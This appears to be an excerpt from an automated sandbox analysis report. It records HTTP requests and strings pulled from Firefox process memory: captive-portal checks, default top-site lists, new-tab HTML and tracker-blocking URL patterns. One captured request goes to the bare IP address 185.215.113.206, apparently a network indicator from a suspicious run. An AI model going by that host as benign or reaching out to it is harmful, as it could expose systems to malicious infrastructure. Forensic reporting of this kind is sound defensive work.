Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: WHERE place_id = (SELECT id FROM moz_places WHERE url_hash = hash(:urlRestartOnLastWindowClosed.#maybeRestartBrowser - Still waiting for all windows to be closed and restartTimer to expire. (not restarting)https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/https://www.baidu.com/,https://www.zhihu.com/,https://www.ifeng.com/,https://weibo.com/,https://www.ctrip.com/,https://www.iqiyi.com/[{incognito:null, tabId:null, types:["sub_frame"], urls:["*://trends.google.com/trends/embed*"], windowId:null}, ["blocking", "requestHeaders"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/https://www.baidu.com/,https://www.zhihu.com/,https://www.ifeng.com/,https://weibo.com/,https://www.ctrip.com/,https://www.iqiyi.com/[{incognito:null, tabId:null, types:["sub_frame"], urls:["*://trends.google.com/trends/embed*"], windowId:null}, ["blocking", "requestHeaders"]] equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: WHERE moz-extension://6edd4cbe-8a9f-4158-beca-90f5feba9c8c/data/ua_overrides.jshttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: WHERE moz-extension://6edd4cbe-8a9f-4158-beca-90f5feba9c8c/data/ua_overrides.jshttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: WHERE moz-extension://6edd4cbe-8a9f-4158-beca-90f5feba9c8c/data/ua_overrides.jshttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Wikipedia&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Reddit&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Twitter&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53CA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3260229875.0000019E4C068000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3260229875.0000019E4C0EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: C:\Program Files\Mozilla Firefox\browser\features\webcompat@mozilla.org.xpihttps://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozilla-20&sourceid=Mozilla-searchhttps://en.wikipedia.org/wiki/Special:Search?search=&sourceid=Mozilla-searchUpdateService:selectUpdate - the user requires elevation to install this update, but elevation is disabled for this version.https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdmatch the pattern /^\{[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\}$/ihttps://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=utf-8&mode=blended&tag=mozilla-20&sourceid=mozilla-searchC:\Program Files\Mozilla Firefox\browser\features\formautofill@mozilla.org.xpiWebExtEvent actions should include a property "source", the id of the webextension that should receive the event.C:\Program Files\Mozilla Firefox\browser\features\webcompat-reporter@mozilla.org.xpi>|[ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]][{incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.faceboo
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E5F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E5F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: doff-text" data-l10n-args="{&quot;user&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button 